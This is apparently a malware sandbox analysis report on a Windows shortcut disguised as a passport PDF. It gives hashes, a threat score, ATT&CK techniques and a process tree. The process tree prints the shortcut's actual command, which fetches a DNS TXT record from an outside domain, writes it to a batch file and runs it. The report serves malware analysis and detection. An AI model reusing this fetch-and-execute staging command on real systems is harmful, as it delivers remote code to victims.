9a1d62c7aa156b0920f87b422ab3685e60393fc97a0b742e533e791adcf5a31d

Analysis

max time kernel
142s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231127-en
resource tags

arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
submitted
13-12-2023 08:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Passport20231023_90223 pdf lnk.lnk
Size

1KB
MD5

c97607e6e04da0e5ef7414821afba0f5
SHA1

2acd031bbb023660c5c214809ef7e32a040ad4dd
SHA256

9a1d62c7aa156b0920f87b422ab3685e60393fc97a0b742e533e791adcf5a31d
SHA512

a5a1d693b1da51fbdc46047af26697efd5f51bf1cc0928065a4cc67a19c1a39d58e68e8b7a70666d9d350c337f5bd5fb5c80fa796e35cc8b809c0b90c33b0b61

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2013768333-4045878716-2922883000-1000\Control Panel\International\Geo\Nation cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

svchost.exe

description pid process

Token: SeManageVolumePrivilege 1040 svchost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2013768333-4045878716-2922883000-1000\Control Panel\International\Geo\Nation	cmd.exe

description	pid	process
Token: SeManageVolumePrivilege	1040	svchost.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 4584 wrote to memory of 1708	4584	cmd.exe	cmd.exe
PID 4584 wrote to memory of 1708	4584	cmd.exe	cmd.exe
PID 1708 wrote to memory of 1632	1708	cmd.exe	nslookup.exe
PID 1708 wrote to memory of 1632	1708	cmd.exe	nslookup.exe
PID 1708 wrote to memory of 1040	1708	cmd.exe	findstr.exe
PID 1708 wrote to memory of 1040	1708	cmd.exe	findstr.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Passport20231023_90223 pdf lnk.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4584
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" cmd /k cd C:\Users\Admin\AppData\Local\Temp & NSlookup -type=TXT tos.viewdobdrv.com | findstr """" > Taste.cmd & Taste.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Windows\system32\findstr.exe
    findstr """"
    3⤵
    PID:1040
- - C:\Windows\system32\nslookup.exe
    NSlookup -type=TXT tos.viewdobdrv.com
    3⤵
    PID:1632

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm

Filesize
16KB

MD5
17497c9e0bc526ed0819cd6ad93df7ae

SHA1
61f164b81a2a2b35af657237efc0b4f7965a414d

SHA256
f86168e7db6ced2551d982ca8adb6c328eeb0cd0b4f44d910209001d79b678ae

SHA512
e03e2a472845c153d610a2d25de8c61f85143a8a163219aa84982e54db83863a0172e66aab81c8c5c0263940dacf77fd000b87e948acd377091a752627659d69

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taste.cmd

Filesize
224B

MD5
e201ea24b4a9bc902fdba32adef12a1d

SHA1
2f612798e94d635629ee357cf9776c19ed54cef4

SHA256
f712c3e0e170c00971fe11a237799b6ae99f6bc55671a881f5875bf4fbf0d2fe

SHA512
643878798d08c99bdda2116b09127cba93cced257c1cbc1497c3929cf0a61dec001f2968e5a7638119c0c0fbd24116f3ba3abbcff13ffc574deebd8118ede766

Download Submit
memory/1040-49-0x00000200DE7A0000-0x00000200DE7A1000-memory.dmp

Filesize
4KB

Download
memory/1040-41-0x00000200DE7A0000-0x00000200DE7A1000-memory.dmp

Filesize
4KB

Download
memory/1040-50-0x00000200DE7A0000-0x00000200DE7A1000-memory.dmp

Filesize
4KB

Download
memory/1040-42-0x00000200DE7A0000-0x00000200DE7A1000-memory.dmp

Filesize
4KB

Download
memory/1040-43-0x00000200DE7A0000-0x00000200DE7A1000-memory.dmp

Filesize
4KB

Download
memory/1040-44-0x00000200DE7A0000-0x00000200DE7A1000-memory.dmp

Filesize
4KB

Download
memory/1040-45-0x00000200DE7A0000-0x00000200DE7A1000-memory.dmp

Filesize
4KB

Download
memory/1040-46-0x00000200DE7A0000-0x00000200DE7A1000-memory.dmp

Filesize
4KB

Download
memory/1040-51-0x00000200DE3C0000-0x00000200DE3C1000-memory.dmp

Filesize
4KB

Download
memory/1040-48-0x00000200DE7A0000-0x00000200DE7A1000-memory.dmp

Filesize
4KB

Download
memory/1040-76-0x00000200DE610000-0x00000200DE611000-memory.dmp

Filesize
4KB

Download
memory/1040-40-0x00000200DE770000-0x00000200DE771000-memory.dmp

Filesize
4KB

Download
memory/1040-47-0x00000200DE7A0000-0x00000200DE7A1000-memory.dmp

Filesize
4KB

Download
memory/1040-52-0x00000200DE3B0000-0x00000200DE3B1000-memory.dmp

Filesize
4KB

Download
memory/1040-54-0x00000200DE3C0000-0x00000200DE3C1000-memory.dmp

Filesize
4KB

Download
memory/1040-57-0x00000200DE3B0000-0x00000200DE3B1000-memory.dmp

Filesize
4KB

Download
memory/1040-60-0x00000200DE2F0000-0x00000200DE2F1000-memory.dmp

Filesize
4KB

Download
memory/1040-8-0x00000200D6080000-0x00000200D6090000-memory.dmp

Filesize
64KB

Download
memory/1040-72-0x00000200DE4F0000-0x00000200DE4F1000-memory.dmp

Filesize
4KB

Download
memory/1040-74-0x00000200DE500000-0x00000200DE501000-memory.dmp

Filesize
4KB

Download
memory/1040-75-0x00000200DE500000-0x00000200DE501000-memory.dmp

Filesize
4KB

Download
memory/1040-24-0x00000200D6180000-0x00000200D6190000-memory.dmp

Filesize
64KB

Download